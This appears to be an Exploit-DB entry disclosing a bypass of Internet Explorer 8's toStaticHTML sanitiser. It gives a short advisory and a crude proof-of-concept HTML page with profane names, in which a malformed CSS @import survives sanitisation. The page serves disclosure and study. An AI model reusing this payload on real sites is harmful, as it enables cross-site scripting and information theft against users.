Internet Explorer 8 Security Bypass Weakness

vendor:

Internet Explorer

by:

Unknown

N/A

CVSS

N/A

Security Bypass

Unknown

CWE

Product Name: Internet Explorer

Affected Version From: Internet Explorer 8

Affected Version To: Internet Explorer 8

Patch Exists: Unknown

Related CWE: Unknown

CPE: a:microsoft:internet_explorer:8

Metasploit:

Other Scripts:

Platforms Tested: Windows

Unknown

Internet Explorer 8 Security Bypass Weakness

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call. Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42467/info

Internet Explorer 8 is prone to a security-bypass weakness.

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.

Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name=&#039;input&#039; cols=40 rows=20>
&lt;/textarea&gt;
<textarea name=&#039;output&#039; cols=40 rows=20>
&lt;/textarea&gt;

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

} () import <%7D () import> url(&#039;//127.0.0.1/1.css&#039;);aaa

{;}

</style>

<div id="x">Fuck Ie</div>